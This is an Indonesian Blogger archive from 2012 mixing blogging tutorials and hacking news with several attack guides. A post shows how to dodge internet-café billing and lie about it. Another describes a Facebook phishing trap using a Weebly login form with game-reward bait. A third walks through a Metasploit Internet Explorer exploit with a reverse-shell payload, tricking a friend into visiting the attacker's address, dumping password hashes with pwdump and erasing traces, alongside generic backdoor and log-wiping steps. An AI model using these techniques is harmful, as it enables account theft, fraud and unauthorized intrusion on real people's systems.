Sabtu, 12 Mei 2012

Cara memasang Tombol Donasi Paypal di Blog

Paypal selain bisa digunakan untuk tarnsfer dan menerima uang juga bisa untuk menerima sumbangan atau Donasi .Dan biasanya tombol donasi ini dipasang di website-website yang memberikan tutorial secara gratis,Free download software, Dan program-program lainya yang diberikan secar gratis .Walaupun tombol ini kelihatanya sepele namun Tombol Donasi Paypal terbukti ampuh untuk mendapatkan banyak uang . sebelum memasang Tombol Donasi Paypal pastikan akun rekening Paypal Kamu sudah berstatus Verified. Untuk Memasang Tombol Donasi Paypal di blog silakan ikuti langkah-langkah berikut :

1.Login ke Paypal Dengan Akun kamu.

2.Lalu klik menu Merchant Service kemudian klik Donations

3.Isikan informasi seperti :
-Organization Name/Servise :Isikan dengan nama organisasi atau yang lainya.
-Customize button :Kalo pengen merubah tampilan tombol klik Customize apperence.
-Curency :Isikan mata uang yang ingin digunakan untuk Donasi
-Contribution Amount :Isikan dengan jumlah sumbangan.
-Merchant Id For Purchase Transctions :Biar lebih aman Pilih secure merchant account id.

4.Klik create button.

5.Copy kode HTML tersebut lalu login ke blogger kemudian klik Tata Letak-->Tambah Gadget-->HTML/javascript Lalu paste kode tersebut didalamnya . jangan lupa Klik simpan . Setelah itu tinggal lihat hasilnya
Read More..

Cara memasang kotak penggemar facebook di Blog

Hai.hai.hai .Sebelum saya makan sore saya mau posting artikel dulu ah.. hehehe Dalam postingan kali ini saya akan membahas bagaimana ,b>Cara memasang Kotak Penggemar Facebook Di Blogger.Kotak penggemar facebook adalah salah satu aksesoris blog yang paling menarik untuk di pasang di sebuah blog . apa manfaatnya ? manfaatnya adalah untuk mengetahui seberapa populer blog kamu,Supaya kaya artis gitu terkenal ,hehehehehe Selain itu juga bisa mendatangkan trafick Pengunjung dari halaman penggemar blog kita, Jadi blog kita tambah rame dech . sebelum membuat kotak penggemar facebook saya usulkan anda sudah membuat halaman penggemar facebook anda .Tapi jangan kwatir saya juga akan membahasnya secara lengkap disini. Langsung aja kita buat Kotak Penggemar Facebook Di Blogger Ikuti langkah-langkah berikut :

CARA MEMASANG PENGGEMAR FACEBOOK DI BLOGGER
1.Log In ke akun facebook anda , jangan ke akun orang laen. heheheh Selanjutnya anda klik Profil

CARA MEMASANG PENGGEMAR FACEBOOK DI BLOGGER
2.Setelah anda klik Profil Cari Bacaan Buat Lencana Profil yang letaknya ada di kiri paling bawah .Carinya pelan-pelan tulisanya warna biru dan agak kecil.Setelah ketemu tinggal klik dech .hehehe

CARA MEMASANG PENGGEMAR FACEBOOK DI BLOGGER
3.Setelah anda Itu lihat Bagian kiri atas Ada mnu Lencana Profil ,Lalu kamu klik beranda widget Setelah itu Kamu pilih Kotak Penggemar

CARA MEMASANG PENGGEMAR FACEBOOK DI BLOGGER
4.Setelah itu Silakan anda buat halaman penggemar anda dulu jika belum ada .Cari bacaan buat halaman

CARA MEMASANG PENGGEMAR FACEBOOK DI BLOGGER
5.Setelah anda membuat halaman akan tampil kode HTML Kotak penggemar facebook anda atau Pilih Other supaya Kode HTMLNya Nongol. Copy Kode tersebut Lalu Log In Ke blogger Lalu Klik Tata Letak Klik lagi Tambah Gadget Pilih HTML/Javasript Lalu Copy Kodenya di situ dan kalo sudah selesai silakan kamu klik SIMPAN.

Selesai Tinggal lihat hasilnya..







Read More..

Cara membuat Link Download di Blog

Apa Itu link download ? Link download adalah seuatu teks atau gambar yang bisa di klik untuk mengarahkan link ke sebuah hosting untuk mendownload sebuah file . Bagaimana Cara membuatnya ? caranya begini Copy kode berikut lalu paste di blog kalian :
<a href="http://www.klinik-it.blogspot.com">Download</a>

Keterangan : Teks yang berwarna biru adalah Link tujuan ketika teks Yang berwarna Merah Di Klik . Teks Yang Berwarna merah juga Bisa anda ganti Dengan kata lain misalnya saja "Klik Disini"Ataupun yang lainya !

Ada banyak Fariasi untuk membuat link download,diantarannya dengan cara membuat linknya berhuruf besar,Miring tebal atau dengan menggunakan gambar . Contohnya sebagaiberikut :

Copy paste kode berikut untuk membuat teks link download menjadi tebal :
<a href="klinik-it.blogspot.com"><b>Download</b></a>

Untuk membuat teks tersebut miring silakan ganti kode <b>dan</b> Dengan <i>dan</i> .

Dan untuk membuat link tersebut Berukuran kecil sampe besar ganti kode yang saya hijaukan dengan kode <h1> dan </h1> . ganti angka tersebut dengan angka 1 - 6 jika ingin menyesuaikan ukuran besar link .

Cara Selanjutnya adalah membuat link download dengan gambar/ikon
Caranya copy paste kode berikut ke blog anda :

<a href="http://www.klinik-it.blogspot.com" title="Download"><img src="http://farm5.static.flickr.com/4042/4278913170_e7973277d8_o.png" width="216" height="74" alt="download[4]" /></a>

Hasilnya adalah sebagi berikut :



Keterangan Ganti Link yang berwarna biru dengan Full link Hosting tujuan anda .

Selamat Mencoba ..........?






Read More..

PLUGIN EP (EMPIRES POINT) WORK




langsung saja tanpa basa basi download disini 
cara pakainya...unrar file tersebut lalu masukan ke folder Plugin di EAAbot kalian kalau belum punya EAAbot bisa download menu blog saya yang ada di atas, lalu restart bot kalian
cara mengetahui ZID dan FBID bisa dilihat pada gambar di bawah
kalian harus mempunyai "Golden Mermaid"
kadang beruntung dapet EP kadang juga enggak....nama pluginnya juga lotery....hhi





BAHAN :
  • Internet Exploler 8 for WinXP disini
  • Flash Player veri 11.2 disini
  • Net FrameWork 4 disini






Read More..

Jumat, 11 Mei 2012

Cara hack billing warnet tanpa software

metode ini hanya sederhana hanya dengan mematikan billing diwarnet kita dapat ber internetan ria tanpa kena biaya alias biayanya tetap nol dan tidak pakai software softweran
coba simak caranya disini :

pertama pilih komputernya dan lakukan prosedur berikut

merestart.nya…. kemudian pas ada tulisan WELCOME pada windows persiapkan diri anda untuk menekan tombol ctrl+alt+del,jangan sampe kedahuluan muncul ya BILLING.NYa!…. lalu setelah anda tekan tombol tadi maka akan muncul windows task manager, lalu klik END TASK pada progam Billing.nya, jreeeeeeeenk, udah deh kita bisa internetan tanpa harus bayar

kalau ketahuan gimana, gampang tinggal bilang saja, komputer ini dari tadi sudah hidup, beres khan

tetapi dosa ditanggung sendiri yaaa

tapi kalu buat bahan pembelajaran ngk apa apa lebi baiknya buat yang baru mau mencoba mendingan coba di warnet teman dulu ok




















Read More..

Info:(Hacker Indonesia Tembus Halaman Admin Facebook)


Tentu kalau mendengar berita soal account profile teman kita yang di hack, itu hal yang biasa. Tapi kali ini ada hal yang jauh lebih luar biasa.
Luar biasa karena kali ini yang dihack adalah halaman Administrator Facebook langsung! Halaman dimana setiap settings/pengaturan terkait layanan Facebook ini dilakukan.
Dan, luar biasa yang kedua adalah bahwa yang melakukan itu semua ternyata seorang  Indonesia (!) berinisial Bi4kkob4r. Kalau kita telusuri melalui mbah Google, maka akan kita dapati situsnya beralamatkan di http://bi4kkob4r.net/
facebook di hack
Dan luar biasa yang ketiga, adalah bahwa ternyata Bi4kkob4r ini bukanlah gambaran sosok hacker yang mengerikan seperti yang banyak digambarkan oleh kebanyakan orang yang diimajinasikan sebagai kelompok perusak, pencuri, dan segudang cap negatif lainnya (walau sebenarnya ciri-ciri seperti itu lebih tepat disandangkan untuk para cracker dan bukan hacker). Bi4kkobar ini hanya menunjukkan bahwa ia mampu menembus sistem keamanan situs Facebook tanpa melakukan pengubahan apapun terhadap situs tersebut.
Untuk itulah kemudian ia mendapatkan reward dari pihak Facebook uang sebesar $2.000. Ini screenshot bayaran yang diterimanya via paypal:
paypal
Nah, siapa bilang anak-anak bangsa Indonesia tidak bisa tampil unjuk gigi dalam bidang networking security di tingkat dunia? Dan semoga sikap Bi4kkob4r ini juga bisa diteladani oleh hacker-hacker (culun) Indonesia lainnya agar tidak cuma bisa merusak account Facebook orang lain yang cuma akan mendapatkan sumpah serapah.









Read More..

Tips Mengedit Template HTML Blogger/Blogspot: Mudah dan Aman


Blogger adalah layanan blog gratis yang memberikan keleluasaan bagi user untuk mengedit tampilan dan fungsi blognya. Secara mendasar, Blogger berplatform HTML/XML dengan didukung pengaturan tampilan CSS dan fungsi-fungsi javascript. Kita mengenal adanya fituredit template HTML Blogger dimana kita dapat dengan bebas melakukan modifikasi, desain ulang, hack, penambahan fitur dari pihak ketiga (third party) berupa widget, dan lain-lain.
Note: Fitur edit HTML Blogger diakses melalui dashboard > design/rancangan > edit HTML.
Beberapa kasus saya temui dari pengunjung dan beberapa teman blogger (khususnya newbie) yang mengeluh karena gagal memasukkan hack/script tambahan, tidak menemukan kode tertentu seperti yang ada di tutorial, bahkan ada pula yang templatenya "kacau" karena salah mengedit template HTMLnya.

Tips ini saya buat untuk memberi masukan dan ide dalam melakukan editing Template HTML agar hasilnya sesuai dengan yang diinginkan. Semoga bermanfaat.


1. Memahami elemen dasar dari template blogger/blogspot sangat penting, pada dasarnya ada 5 elemen penting pada template Blogger yang hampir sama dengan elemen dasar web HTML pada umumnya:
a. HTML/XML tag, yang menandakan bagian dari keseluruhan halaman, diawali dengan <html> dan diakhiri dengan </html>. Khusus untuk tag-tag XML, untuk template Blogger dan HTML editor setelah tahun 2007, selalu diakhiri dengan /, contoh: <data:post.body/>.
b. Head tag, merupakan bagian dari keseluruhan head halaman, di dalamnya dimasukkan aturan-aturan yang mengatur banyak hal, termasuk tampilan (CSS), diawali dengan <head> dan diakhiri dengan </head>.
c. Body tag, merupakan isi dari halaman web/blog, di dalamnya terdapat konten/isi inti halaman, termasuk pula widget-widget yang menjadi bagian dari isi halaman, diawali dengan <body> dan diakhiri dengan </body>.
d. CSS, elemen pengatur tampilan halaman, baik dari segi warna, font, posisi, lebar luas, dan masih banyak lagi. Letaknya diantara <b:skin><![CDATA[ dan ]]></b:skin> dan berada pada bagian head. Pada beberapa kasus kode CSS juga dimasukkan tepat di atas </head> sebagai aturan tambahan.
e. Javascript, merupakan elemen yang sebenarnya mengandung software (web widget) yang berisi perintah-perintah tertentu. Biasanya digunakan untuk memasukkan elemen tambahan seperti popular post, auto readmore, dan sebagainya. Ada dua jenis javascript yang dapat digunakan: internal, yang diupload dan di-host langsung di Blogger, daneksternal, yang diupload dan dihosting di server lain. Letaknya relatif, tergantung jenisnya. Untuk yang berjenis widget biasanya ada di dalam body.

2. Biasakan back up template terlebih dahulu sebelum editing, klik "Backup Full Template" di atas kotak "Edit HTML". Jika ada kesalahan dan anda tidak tahu script mana yang harus dibenahi, anda dapat dengan mudah mengupload file back-up template dan mengembalikan seperti semula.

3. Perhatikan benar-benar tutorial yang dibaca, jangan sampai ada yang terlewatkan. Sebagai contoh, jika harus mencentang/klik "expand widget templates", maka pastikan sudah melakukannya. Fungsi dari perintah tersebut adalah untuk membuka bagian-bagian body yang mengandung widget. Jika tidak dicentang, bagian-bagian tersebut akan "disembunyikan" oleh Blogger karena memang ditujukan untuk keamanan.

4. Ketika meng-copy script dari halaman tutorial yang anda baca, pastikan semua bagian script sudah tercopy atau jangan ada bagian selain dari script yang ikut ter-copy.

5. Jika harus mengubah isi script/kode, misalnya mengganti url blog/feed, value, dan lain-lain, salin/paste terlebih dahulu kode/script tersebut ke editor semacam notepad, wordpad, word. Setelah melakukan pengubahan script dan memastikan semuanya beres, baru masukkan script tersebut ke template HTML.

6. Agar lebih mudah dan cepat mencari kode tertentu seperti yang diminta di dalam tutorial, gunakan fitur pencarian browser, tekan Ctrl + F, setelah kotak pencarian muncul masukkan kode yang ingin dicari dan tekan next (enter).

7. Perhatikan benar-benar istilah di bawah/setelah serta di atas/sebelum, itu berarti letakkan kode benar-benar setelah atau sebelum kode yang dicari. Kode-kode dibaca oleh browser dari kiri ke kanan sebagai urutan. Atas bawah hanya digunakan untuk memberi kenyamanan dalam mengurutkan. Bagi browser, dia tetap dibaca dari kiri ke kanan. Contoh:
<b:include data='top' name='status-message'/><data:adStart/>
Kita lihat di situ ada 2 tag bersisian, jika harus memasukkan tag/kode baru <b:include data='posts' name='breadcrumb'/> di bawah/setelah <b:include data='top' name='status-message'/>, itu berarti anda harus meletakkan benar-benar setelahnya, sehingga<data:adStart/> harus digeser posisinya, atau kode/tag baru disisipkan di antara keduanya, jadinya: 


<b:include data='top' name='status-message'/>
<b:include data='posts' name='breadcrumb'/> 
<data:adStart/>
atau,
<b:include data='top' name='status-message'/><b:include data='posts' name='breadcrumb'/><data:adStart/>
8. Jika memang masih belum yakin dan terbiasa, buatlah blog baru yang fungsinya untuk eksperimen dan uji coba script (trial and error). Anda bisa dengan bebas melakukan uji coba tanpa ada ketakutan template blog anda rusak atau pembaca kabur. Agar hasilnya akurat, gunakan jenis template yang sama seperti blog anda. Saya memiliki 3 blog untuk eksperimen dan mencoba script baru sehingga bisa dengan bebas melakukan apapun tanpa rasa khawatir.

9. Khusus untuk hack/script tertentu di mana tampilannya bisa langsung dilihat di homepage/beranda (misalnya: memasang readmore atau background), setelah memasukkan script dan selesai meng-edit, jangan langsung di-save dulu. Gunakan/klik fitur preview/pratinjau untuk melihat hasilnya. Jika sudah beres dan sesuai yang diinginkan, baru lah di-save.

10. Pada beberapa template, ada yang bagian tertentunya di apit oleh tag paragraf: <p> dan </p>, sehingga ketika bagian tertentu tersebut dicari, seolah tidak ketemu. Jika template anda berjenis seperti ini, jangan menyerah terlebih dahulu.
Contoh:
Ketika harus mencari <data:post.body/>, dan tidak ketemu, maka ada kemungkinan tag paragraf mengapitnya (<p><data:post.body/></p>), atau ada beberapa kondisi lain (misalnya, anda lupa mencentang "expand widget templates"). Agar lebih mudah lagi, jangan sertakan < dan /> ketika mencari (Ctrl + F), cukup gunakan data:post.body saja.

Masih ada beberapa lagi yang hendak saya sampaikan, namun sekiranya 10 poin di atas cukup lengkap untuk menjadi tips dan petunjuk agar lancar dan aman dalam mengedit Template HTML Blogger/Blogspot. Selanjutnya, sobat Blogger dapat mengembangkan dan membiasakan diri dengan template dan template editor Blogger serta melakukan editing secara mandiri (Do It Yourself [DIY]). Keep on learning and learning.
Salam.
Read More..

Rabu, 09 Mei 2012

Hacker Ancam Sebar Data dan Informasi Rahasia Militer AS



Laporan Wartawan Tribunnews.com, Samuel Febriyanto
TRIBUNNEWS.COM, WASHINGTON - Sekelompok peretas menyatakan akan mengungkapkan data maupun informasi yang mereka curi dari situs perusahaan analisis dan intelijen Amerika Serikat, Strategic Forecasting Inc. Perusahaan tersebut terkenal sebagai perusahaan penting karena kliennya meliputi Wallstreet hingga Angkatan Bersenjata Amerika Serikat.
Selama sepekan ini, situs perusahaan Strategic Forecasting Inc yang lebih dikenal sebagai Stratfor, ditutup, dengan alasan situs telah diretas dan beberapa informasi pelanggan korporasi telah terungkap ke publik.
Seperti dilansir dari Reuters, Rabu (28/12/2011), Kelompok peretas yang menamai diri mereka sebagai Antisec, mengaku bertanggungjawab atas serangan tersebut dan mengancam akan membuat "kekacauan" dengan merilis dokumen yang telah dicuri.
Antisec telah memulai ancaman tersebut lewat aksi menyebarkan daftar ribuan pelanggan Stratfor, baik yang merupakan korporat maupun pemerintah, serta alamat email, password, juga nomor kartu kredit pelanggan individu.
Daftar pelanggan Stratfor yang diungkap ke publik oleh Antisec diantaranya Bank of America, Exxon Mobil, Goldman Sachs & Co, Interpol, Thomson Reuters, militer AS, dan PBB.
Mengantisipasi kekacauan yang akan timbul akibat hal tersebut, Stratfor dalam suratnya ke pelanggan menyatakan pihaknya menawarkan perlindungan pencurian identitas dan layanan pemantauan untuk pelanggan yang terkena dampak.
Chief Executive Stratfor, George Friedman, dalam pernyataanya di halaman Facebook perusahaan mengatakan data atau informasi yang diungkap AntiSec ke publik, tidak bersifat rahasia.
Namun Antisec, mengancam akan segera mempublikasikan data dan informasi klien Statfor yang sifatnya lebih rahasia, dan sensitif. Adapun tujuan mereka melakukan hal tersebut, adalah untuk membuka kedok Statfor yang selama ini mengumumkan dirinya bukanlah sebagai perusahaan yang berbahaya.
"Stratfor bukanlah 'perusahaan berbahaya', setidaknya itu cara mereka menggambarkan diri mereka sendiri. Anda bisa melihatnya nanti siapa mereka sebenarnya, melalui informasi yang kami berikan melalui email anda," kata Antisec melalui akunTwitter-nya.
Read More..

Selasa, 08 Mei 2012

Trix Hack Facebook Tanpa Program


Mesin Hack Gabungan antara weebly dan blogger





kali ini saya akan membahas hack facebook jebakan...trik ini sangat mudah tanpa membeli program pro facebook hack v 1.5 atau 007 facebook hack v 1.0  kalian hanya bermodal kan akun saja, buat lah weebly dan blog kalau anda sudah membuat ke dua nya itu..baru anda padukan,cara nya anda harus bisa membuat posting yang menarik di weebly anda dengan iming-iming yang menarik buat pengguna facebook..misal nya game facebook,lalu postingan anda harus di kasih tempat email dan password lalu login itu sudah di sediakan oleh weebly,guna nya untuk penjebakan,kalau postingan anda sudah selesai copy paste kan yang ada di weebly anda ke postingan blog anda..sesudah itu, anda coba memasuk kan email dan password palsu (contoh) kalau berhasil pasti di komputer anda muncul tap baru yg bertulisan suksesfull.kemudian lihat di weebly anda klik more muncul kotak kecil klik from entries lihat email dan password yg anda tulis tadi sudah masuk apa belum di weebly anda,tetapi biasa nya kalau sudah suksesfull 100% sudah masuk.jangan lupa postingan yg buat jebakan facebook yang ada di blog  itu tadi anda sebar luaskan di jejaring sosial facebook di jamin anda dapat facebook banyak,apa lagi ada orang yang tertarik pada postingan atau iming iming itu tadi.

di bawah ini contoh postingan nya:



Cara mudah mendapatkan 1000 Bijih Gift
dan lihat hasil nya,tampa menggunakan Cheat
hanya menggunakan trik
Penerbit GM Empires & Allies.com


Penerbit GM Empires & Allies.com
Silahkan Login Facebook anda di bawah in & Centang salah satu Bijih Gift dibawah.
THANK

kalau ada orang yang memasuk kan email dan password nya di bawah ini otomatis langsung masuk di weebly anda



    Aluminium Copper Gold IronUranium










Semoga trik ini bermanfaat buat anda pengunjung blog saya,saya akan memberi video nya lain waktu saja




Read More..

Konsep Dasar Hacking




Iseng-iseng belajar hack bersama Boy.Rezza,,Dalam suatu kesempatan, saya pernah melihat seorang auditor keamanan jaringan melalukan penetration test (pen-test) terhadap suatu sistem IT. Karena penasaran saya melihat sedikit2 cara penetration test yang dilakukan. Waktu itu saya belum banyak tahu tools apa aja yang digunakan, yang saya tau dia menggunakan tcpdump untuk menganalisis paket apa aja yang lewat, trus untuk men-scan beberapa host menggunakan Nessus. Ada salah satu aplikasi yang digunakan berbasis web yang terdapat kumpulan beberapa exploit. Waktu itu saya belum tahu aplikasi apa itu, yang saya ingat aplikasi itu menggunakan alamathttp://127.0.0.1:55555, nah berbekal port 55555 saya mencari di google, dan ternyata itu adalah Metasploit Framework!.
Peristiwa itu menginspirasikan saya untuk mengenang masa-masa lalu ketika masih seneng2nya ngoprek dan belum ‘tercemar’ oleh DotA. Akhirnya sekarang saya ingin belajar ngoprek lagi, tp lebih fokus ke exploitnya saja. Tulisannya ini akan saya buat menjadi tiga bagian. Bagian pertama mengenai bagaimana salah satu cara umum yang dilakukan untuk menge-hack suatu system. Disini saya lebih menitikberatkan untuk hacking OS Windows XP, karena OS ini paling banyak dipakai orang. Bagian kedua lebih banyak ke teori mengenai exploit. Tapi karena mungkin akan sangat sulit dipahami (saya sendiri msh blm bisa membuat exploit sendiri), saya hanya menuliskan hasil terjemahan yang membahas apa itu dan cara kerja exploit. Sedangkan bagian terakhir merupakan praktek bagaimana mengelakukan penetration test menggunakan metasploit di Windows XP.


Bagian 1
*ini merupakan artikel lama mengenai salah satu cara umum yang dilakukan untuk hacking. (artikel ini jg di mirror oleh Negative a.k.a Jim Geovedi di sini). Langkah dibawah ini merupakan cara ‘standar’, hacking sebenarnya tidak harus selalu sesuai dengan ‘standar’ ini.

Hacking buat pemula
- by aCh
Artikel ini ditujukan bagi pemula, dan disusun oleh pemula. Ditulis untuk pengetahuan semata. Untuk temen2 yg udah ahli, sok aja dilewat, tapi dibaca juga gpp….
Apa sebenarnya hacking itu? klo menurut pengertian gue, hacking adalah ngoprek. Yup, hacking adalah ngoprek, mempelajari sesuatu dengan keingintahuan (curiosity) yg tinggi, ngutak atik sesuatu, ‘ngudek-ngudek’ sampai ke ‘jeroannya’. Sesuatunya apa dong? ya terserah… bisa komputer, mobil, motor, mesin. Tapi masalahnya ada ngga ya hacker mobil, hacker motor, atau hacker pesawat terbang?? hehe… Walaupun saat ini hacking identik dengan ‘bobol-membobol’, tapi gue kurang setuju klo cuman bobol server orang doang!. Ada yang bilang ‘Hacking is Art’, trus dimana letak seninya dong? Mau tau pengertian hacking sebenarnya, coba baca artikel sebelumnya (How to Become A Hacker). Di situ dijelasin bahwa hacker berkaitan dengan kemahiran teknis serta kegemaran menyelesaikan masalah dan mengatasi keterbatasan. Contoh hacker pada saat ini yang sering-sering disebut adalah Linus Torvald (tau ngga? itu lho yang menciptakan Linux). Apa dia tukang bobol? belum tentu kan….
Pada artikel ini, gue pengen membagi pengalaman mengenai Hacking, walaupun sampai saat ini gue belum pernah nge-Hack ke server orang. Salah satu cara untuk mencoba simulasi Hack yaitu H3cky0uRs3lf! Buat komputer kita sebagai server (sekaligus belajar konfigurasi server) trus install program yg dibutuhkan. Misalnya klo mo Web Hacking, coba install Apache atau IIS. Atau kita sesuaikan dengan exploit yang udah kita dapet. Tapi lebih baik install Linux atau FreeBSD dulu di komputer pribadi, trus konfigurasi sebagai server, lalu simulasi Hack, setelah itu baru Hack Betulan… Apalagi klo di kost ada jaringan.
Pro dan Kontra Hacking
Pro
Kontra
Etika Hacking
Semua informasi adalah free
Jika semua informasi adalah free, maka tidak ada ladi privacy
Aspek Security
Intrusion adalah ilustrasi kelemahan sistem
Tidak perlu menjadi pencuri untuk menunjukkan pintu yang tidak terkunci
Idle Machines
Hacking hanya pada idle machines
idle machines milik siapa ?
science education
hanya membobol tapi tidak merusak
“hacker wannabe” berpotensi sangat besar untuk merusak
Okeh, sekarang waktunya melakukan aksi…

1. Fase Persiapan
~ Mengumpulkan informasi sebanyak-banyaknya
– Secara Aktif : – portscanning
– network mapping
– OS Detection
– application fingerprinting
Semua itu bisa dilakukan menggunakan toolz tambahan seperti nmap atau netcat
– Secara Pasif : – mailing-list (jasakom, newbie_hacker, hackelink, dsb)
– via internet registries (informasi domain, IP Addres)
– Website yang menjadi terget


2. Fase Eksekusi
~ Setelah mendapatkan informasi, biasanya akan didapatkan informasi mengenai OS yg digunakan, serta port yang terbuka dengan daemon yg sedang berjalan. Selanjutnya mencari informasi mengenai vulnerability holes (celah kelemahan suatu program) dan dimanfaatkan menggunakan exploit (packetstromsecurity.orgmilw0rm, milis bugtraq, atau mencari lewat #IRC).
~ Mengekspolitasi Vulnerability Holes
- compile eksploit -> local host ->
$gcc -o exploit exploit.c
$./exploit
# hostname (# tanda mendapatkan akses root)
remote host -> $gcc -o exploit exploit.c
$./exploit -t www.target.com
# (klo beruntung mendapatkan akes root)
~ Brute Force
– Secara berulang melakukan percobaan otentifikasi.
– Menebak username dan password.
– Cracking password file
~ Social Engineering
– Memperdayai user untuk memeberi tahu Username dan password
– Intinya ngibulin user….

3. Fase Setelah Eksekusi
~ Menginstall backdoor, trojans, dan rootkit
~ Menghapus jejak dengan memodifikasi file log agar tidak dicurigai admin
~ Menyalin /etc/passwd atau /etc/shadow/passwd
Nah, intinya seh cara masuk ke server seseorang seperti fase diatas. Mencari informasi, temukan exploit, dan tinggalkan backdoor. Cuma masalahnya hacking bukanlah segampang cara-cara diatas. Itu hanyalah teori, banyak hal yang harus diperhatikan jika ingin mempraketekkan hacking ke server seseorang. Jangan sekali-kali mencoba2 hacking ke server orang tanpa memperhatikan anonimitas (apalagi klo connectnya lewat komputer pribadi tanpa menggunakan proxy). Ntar klo ketahuan bisa repot. Saran gue, cobalah pada mesin localhost dulu (komuter pribadi), klo terhubung ke LAN lebih bagus. Sediakan server yang khusus buat dioprek. Kalaupun pun ga terhubung ke jaringan, kita masih bisa menggunakan Virtual Machine menggunakan VMWare seperti yang akan kita bahas di bagian 2 ini.



Bagian 2
Setelah mengetahui sedikit dan konsep dasar ‘standar’ mengenai hack yang dibahas dibagian pertama dan mengetahui sedikit materi mengenai exploit pada bagian kedua, sekarang langsung aja kita praktek. Disini saya sengaja menggunakan VMWare untuk melakukan simulasi, karena tidak semua orang dapat mempraktekannya dalam suatu jaringan. Dengan menggunakan VMWare, kita dapat mensimulasikan jaringan sederhana yang seolah-olah ada suatu jaringan yang terdiri dari komputer kita sendiri dan komputer lainnya. Bagi yang belum bisa menggunakan VMWare, coba cari diinternet! Sistem Operasi yang saya gunakan adalah Windows XP SP2.
Tools yang saya gunakan adalah Metasploit Framework untuk melakukan exploit sertaPwDump6 untuk mengambil hash file dari komputer target. Apa itu Metasploit Framework ?
The Metasploit Framework is a complete environment for writing, testing, and using exploit code. This environment provides a solid platform for penetrationtesting, shellcode development, and vulnerability research.
Untuk penggunaan lebih lanjut mengenai Metasploit, anda dapat membacadokomentasi yang juga diikutsertakan dalam instalasi. Untuk melakukan instalasi metasploit versi 2.7, dibutuhkan user administrator. Sebelumnya saya mencoba menginstall dengan ‘limited user’ tapi setelah diinstall tidak bisa dijalankan. Sebenarnya instalasi metasploit ini hanya mengekstrak file saja. Jadi anda dapat menginstallnya tanpa harus mendapatkan user admin serta meletakkannya dimanapun tanpa harus menginstal di Folder Program Files. Namun setelah sedikit dioprek, ternyata tidak harus admin yang bisa menjalankan. Agak ribet dan males juga sih nulis disini, soalnya ketika mencoba versi terbaru, yaitu versi 3 Beta 3, kita dapat menjalankannya tanpa harus menginstall dengan user admin. Gitu aja ko repot! Lagipula versi 3 (skarang msh beta) lebih keren dan fiturnya lebih banyak. Tapi sayangnya untuk msfweb (versi webnya) belum bisa dijalankan sepenuhnya.
Ok.. sekarang saya asumsikan anda telah membaca userguide metasploit (ah.. paling asumsi saya salah ;p). Biar lebih keliatan keren dan memahami detailnya, saya menjelaskan metasplooit yang menggunakan console (mfsconsole) saja. Metasploit menggunakan cygwin untuk menjalankannya, karena metasploit dibuat menggunakanPerl. Sekarang mari kita praktekkan!!
Pertama2 jalankan ‘mfsconsole’!
main1.JPG
Untuk mempelajari command apa saja yang ada di MSFConsole gunakan perintah ‘help’.
Karena komputer yang ingin dijadikan target adalah Windows XP SP2, maka digunakan exploit yang berpengaruh terhadap XP SP2 yaitu dengan memanfaatkan kelemahan pada Internet Explorer VML Fill Method Code Execution.
This module exploits a code execution vulnerability in Microsoft Internet Explorer using a buffer overflow in the VML processing code (VGX.dll). This module has been tested on Windows 2000 SP4, Windows XP SP0, and Windows XP SP2.
Untuk melihat info dari exploit ini gunakan perintah :
msf > info ie_vml_rectfill
Exploit ie_vml_rectfill memanfaatkan kelemahan pada Internet Explorer. Oleh karena itu, exploit ini akan berpengaruh jika komputer target menjalankan IE dan mengarahkan url-nya ke komputer penyerang. Untuk itu, kita harus menggunakan sedikit ‘social engineering’, seperti jika di kost/lab/kantor kita bilang ke teman kita bahwa kita sedang mencoba membuat aplikasi web terbaru, lalu minta tolong dilihat menggunakan IE ke alamat IP (atau nama komputer) kita. Misalkan http://192.168.186.1. Biasanya setelah exploit ini dijalankan dan komputer target telah terhubung, maka IE akan crash. Biarkan beberapa saat untuk membiarkan exploit ‘bekerja’. Setelah beberapa saat bilang aja “wah.. ada error nih. Ok deh.. saya coba betulin dulu… makasih ya”. Baru tutup IE-nya pake Task Manager (walaupun pake TM, IE msh sulit di-kill, jangan lupa untuk me-’end process’-kan ‘dumpred.exe’ juga, tapi setelah exploit bekerja :-D ).


Untuk menggunakan exploit gunakan perintah2 berikut dalam console :
msf > use_ie_vml_rectfill
msf > set PAYLOAD win32_reverse
msf > set RHOST ip_target
msf > set LHOST ip_penyerang
msf > exploit
Hasilnya akan tampak seperti gambar berikut :
exploit1.JPG
Dalam contoh diatas, IP komputer target (RHOST) adalah 192.168.186.128, sedangkan komputer penyerang (LHOST) adalah 192.168.186.1. Lalu ‘payload’ yang digunakan adalah ‘win32_reverse’ dan HTTP PORT nya adalah 80 (default http port). Setalah menjalankan perintah ‘exploit’, baru kita minta komputer target untuk menjalankan IE dan mengarahkan url-nya ke komputer kita. Proses ini akan memakan waktu agak lama, bahkan terkadang tidak berhasil. Jadi coba-coba aja terus :-D
Jika anda berhasil, maka anda akan mendapatkan ‘cmd.exe’ dari komputer target.

Crack da Password!
Nah, setelah kita ‘menguasai’ komputer target, skalian aja kita lihat password-nya. Caranya mirip dengan artikel saya sebelumnya tentang Hack Win XP SP2 Password, tapi karena ini remote maka kita harus ‘menyediakan’ program yg dibutuhkan yaitu PwDump. Agar cara ini berhasil, saya asumsikan pada komputer target user yang sedang login mempunyai akses admin. Klo user yang digunakan komputer target yang dimanfaatkan IE-nya hanya user ‘biasa’, pwdump tidak akan berhasil!
Pertama kita share dulu PwDump dari komputer kita dengan full access agar kita bisa mengupload hasil dump password komputer target, tapi dengan akhiran ‘$’ biar tidak terlihat dikomputer umum. Misalkan nama folder yang di share PwDump$. Lalu dari console yang berhasil dihack, ambil PwDump dengan Map Network Drive dari komputer kita dengan ‘net use’. Contoh perintah yang digunakan :
pwdump.JPG
Setelah itu copy Pwdump ke komputer target dalam folder sementara, ‘temp’. Setelah Pwdump berhasil di-copy ke komputer target, jalankan Pwdump dengan perintah
C:\temp\Pwdump –o pass.txt 127.0.0.1
Klo berhasil akan tampak pada gambar berikut.
 dump1.JPG
 Lalu copy file pass.txt ke komputer kita
C:\temp\copy pass.txt z:
Dan terakhir, jangan tinggalkan jejak bahwa kita sudah mampir kesitu.
clean.JPG
Nah, udah dapet hash file nya kan. Tinggal di crack aja deh…. (baca artikel sebelumnya buat nge-crack password).
Sebenarnya masih banyak yang dapat dioprek dari metasploit. Dalam metasploit terdapat banyak exploit, payload, meterpreter, dsb yang sangat ‘menyenangkan’ untuk dioprek. Untuk mempelajari metasploit, disitusnya terdapat dokumentasi yang lumayan baik.
Happy Hacking…..

Beberapa saran agar windows kita tetap aman terhadap exploit diatas.
1. Jangan gunakan Internet Explorer. Gunakan Mozilla Firefox atau Opera!.
